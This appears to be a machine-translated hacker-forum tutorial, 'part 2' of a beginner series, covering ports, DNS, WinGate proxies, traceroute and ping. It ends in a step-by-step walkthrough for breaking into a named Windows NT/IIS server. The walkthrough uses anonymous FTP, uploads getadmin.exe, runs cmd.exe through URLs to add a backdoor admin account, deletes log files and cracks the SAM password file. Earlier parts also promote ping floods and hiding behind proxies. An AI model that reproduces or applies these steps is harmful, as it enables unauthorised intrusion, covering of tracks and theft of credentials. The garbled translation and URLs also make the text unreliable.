The virtual port is a natural number that is encapsulated within the TCP (Tranmission Control Protocol) and UDP (User Diagram Protocol) header. As everyone knows, Windows can run multiple programs at once, each of which has a dedicated port for transmitting and receiving data.
For example, a machine with an IP address of 127.0.0.1 runs WebServer, FTP_Server, POP3 server, etc. These services are running on an IP address of 127.0.0.1, when a packet arrives. Our ability to distinguish which services this packet goes to, WebServer or FTP server or SMTP? That's why Port appears. Each service has a default port number, for example, FTP has a default port of 21, the web service has a default port of 80, POP3 is 110, SMTP is 25, ...
Network administrators can change this default port number, if you do not know the port number on a server, you can not connect to that service. You have heard of MAPPING but probably do not know what it is and how it functions. Port mapping is simply the process of converting a service's default port number to another number. The default WebServer port is 80, but sometimes you may still see it http://www.xxx.com:8080 , 8080 here is the port number of host xxx but the host of this host "map" from 80 to 8080.
(HVA document)
Check out part 1: The Most Basic Understanding to Become a Hacker - Part 1
15. What is DNS?
DNS stands for Domain Name System. A DNS server waits for connection at port 53, which means that if you want to connect to that server, you must connect to port 53. The DNS server transfers the hostname with letters to the corresponding digits. and vice versa. Example: 127.0.0.1 - & gt; localhost and localhost --- & gt; 127.0.0.1.
16. Something about the Wingate
WinGate is a simple program that allows you to split out incoming connections. For example, you can share a modem with two or more machines. WinGate uses many different proxies that can hide you.
How can Wingate hide you? Follow me: You telnet on port 23 on the server running WinGate telnet proxy and you will have the WinGate prompt & gt ;. At this prompt you type the server name, the same space and port you want to connect to. For example:
CODE
telnet wingate.net
WinGate & gt; victim.com 23
I telnet to port 23 because this is the default port when you install Wingate. At this time, the IP on our victim machine is captured by the IP of the server containing the Wingate proxy.
How to find Wingate?
If you want to find static IP (Static IP), go to yahoo or a cable modem search page. Look for cable modems because many cable modems have WinGate so that they can share its broad cable modems for other machines in the same house. Or you can use Port or Domain scanners and scan Port 1080.
+ To find the dynamic IP (WinGates IP for each user connected to the internet) you can use Domscan or other scanning programs. If you use Domscan, enter the IP address in the first box and the number 23 in the second box. Once you have the results, try to telnet to the IP address searched (guided above), if It appears that the "Wingate & gt;", you have found the right machine is using Wingate then.
+ In my experience, you down wingatescanner on the internet, it is very much on the network.
Traceroute is a program that allows you to track the path of packets from your computer to the target system on the Internet.
See the following example:
CODE
C: windows & gt; tracert 203.94.12.54
Tracing route is 203.94.12.54 over a maximum of 30 hops
1 ms2.2 ms 1 ms ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (9.41.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms
I need to know the path from my computer to a host on the Internet whose ip address is 203.94.12.54. I need to tracert to it! As you can see above, packets from the machine I want to reach 203.94.12.54 must go through 13 hops on the network. This is the path of packets.
Take a look at the next example:
CODE
host2 # traceroute xyz.com
traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms
The first line indicates the hostname and IP address of the target system. This line also tells us the TTL value & lt; = 30 and the size of the datagram is 40 bytes (20-bytes IP header + 12-bytes user data).
The second line indicates that the first router that receives the datagram is 202.xy.34.12, the TTL value sent to this router is 1. This router sends back the ICMP message error "Time Exceeded" to the traceroute program. Traceroute will forward a datagram to the target system.
The third line, xyz.com (202.xx.12.34) receives the TTL datagram = 1 (the first router has dropped one before - TTL = 2-1 = 1). However, xyz.com is not a router, it will return traceroute an ICMP error message "Port Unreachable". Upon receipt of this ICMP message, traceroute will know that it has reached the target system xyz.com and finish the task here.
In case the router does not respond within 5 seconds, traceroute will print an "*" (unknown) and continue sending other datagrams to the destination host!
Attention:
- In Windows: tracert hostname
- In Unix: traceroute hostname
(Documents of viethacker.net)
18. Ping and how to use
Ping is a very simple concept but very useful for network diagnostics. The history of the word "ping" is as follows: Ping is a sound when a submarine wants to know if there is another object nearby, or if there is an object near the submarine this sound will hit. That object and the resonance will be "pong" so the submarine will know what is near you.
On the Internet, the concept of Ping is very similar to its profile as mentioned above. The Ping command sends an ICMP (Internet Control Message Protocol) packet to the host, if the host pong means that the host exists (or is reachable). Ping can also help us know the amount of time a packet travels from one computer to another.
Ping is easy, just open MS-DOS, and type "ping", which will default to ping 4 times, but you can also type
CODE
"ping ip.address -t"
This will make the ping machine forever. To change the ping size do the following:
CODE
"ping -l (size)"
The ping is to send a packet to a computer, then see how long it takes to see the packet and see how long that packet has returned, which determines the speed of the connection, and how long it takes. Leave one packet going back and forth and divide by four (called "trip time"). Ping can also be used to slow down or crash the system with pinging floods. Windows 98 hangs after a ping of floods. (The buffer of the connection is overflow - there are many connections, so Windows decided to give it a break.) A "ping flood" attack will take up a lot of your bandwidth, and you have to have more bandwidth than your opponent (unless your opponent is a Windows 98 machine and you have an average modem, by the way Will knock down the enemy after approximately one minute of ping floods. Flooding is not very effective with slightly stronger opponents. Unless you have lots of lines and you control a relatively large number of servers with the same ping, the total bandwidth is greater than the other.
Attention: DOT's -t option does not cause ping flood, it just pings the target continuously, with intervals between two consecutive pings. In all Unix or Linux systems, you can use ping -f to cause real flooding. The fact is that you must ping -f if you are using a unix-based POSIX (POSIX - Portable Operating System Interface), otherwise it will not be a real Unix / Linux system, so if you use a Linux which it claims to be Unix or Linux, it will have the -f parameter.
(HVA and viethacker.net documentation)
19. Intrusion of Windows NT from the Internet
This is the first hack lesson that I did when I started researching hacking, now I'll show you. You will need some time to do it because it is easy but hard. I will start:
First you need to find a server running IIS:
Next you go to DOS and type "FTP". VD:
c: Ftp www.dodgyinc.com
(This page, when I practice, is still done, now do not know if they have fixed, if you have any other page, please post for everyone to do offline)
If you connect successfully, you will see some lines similar to this:
CODE
Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):
What we see above contains very important information, which tells us the Netbios name of the computer is "Vdodgy". From this you can infer the name that is used for the NT to allow you to exploit, the default that the FTP service assigns to it if it has not been renamed will be "IUSR_VDODGY". Remember it will be useful for us. Enter "anonymous" in the user it will appear the following line:
CODE
331 Anonymous access allowed, send the identity (email) as password.
Password:
Now the password will be anything you do not know, however, try to type the password is "anonymous". If it is wrong, you log back to the FTP device, remember that when you return this time, do not use anonymous (anonymous) that use "Guest", try passwd with "guest" any.
Now enter the command in DOS:
CODE
Cd / c
And if you have successfully penetrated, you should now see the "cgi-bin" directory. If you are lucky you will find it easy because the management system has put "cgi-bin" into the place we just invaded, so that their managers easier to control the network. The cgi-bin directory may contain programs that you can use to run it from your Web browser. Let's start "stirring" greenbiggrin.gif greenbiggrin.gif.
First, move to the cgi-bin directory and use the command "Binary" (you may not need this command), then type "cmd.exe". Next you need to have the file hack to install into this directory, look on the network to grab the two most important files that are "getadmin.exe" and "gasys.dll". Download them, once you have it installed in the cgi-bin directory. Ok, let's close the DOS window.
Now type the following into your browser:
http://www.dodgyinc.com/cgi-bin/ge tadmin.exe? IUSR_VDODGY
After a few seconds you will get the answer as below:
CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations, now account IUSR_VDODGY have admin rights!
So you have impersonated admin to penetrate the system, the need is now you create yourself an account, please type the following in IE:
http://www.dodgyinc.com/cgi-bin/cmd.exe? / c% 20c: winntsystem32net.exe% 20user% 2 0hacker% 20toilahacker% 20 / add
The command line will create a login account with user: anhdenday and password: toilahacker. Now let's make this user have admin account, just type in IE command:
http://www.dodgyinc.com/cgi-bin/ge tadmin.exe? anhdenday
That's it, disconnect and go to Start Menu - & gt; find then search computer "www.dodgyinc.com". When you find it, explore, explore NT will open you or enter user and password to open it (mine is user: anhdenday and password: toilahacker).
There is a problem that when you enter this system will be logged, so to delete the trace you go to "Winntsystem32logfiles" open the log file and delete the information related to you, then save them. If you want to get a message about sharing intrusion, then change the date on your computer with the following URL:
http://www.dodgyinc.com/cgi-bin/cm d.exe? / c% 20date% 2030/04/03
Then delete the file "getadmin.exe", and "gasys.dll" from "cgi-bin". The purpose of this system is to "steal" the admin pass for the next time to enter the valid, so you look for the SAM file (containing the admin and member pass) in the system then use the program "l0pht crack "to crack pass (Tutorial on how to use" l0pht crack v 3.02 "I have posted already, you study it yourself). Here is the link: http://vnhacker.org/forum/?act=ST& f = 6 & amp; t = 11566 & amp; s =
Once you have cracked the user and admin pass, then delete the user account (my "anhdenday") for safety. What you can do in the system is as you like, but you do not delete all their documents, sin very much for them.
How do you feel, is not it? When I try to hack this way, I have been tinkering all four hours, if you are familiar then the second you will take less time.
In part 3, I will cover the Linux operating system, how to break the password protection of a website, and how to hack a simple website, etc.
Out of season 2
Author: Anhdenday - HVAOnline.net
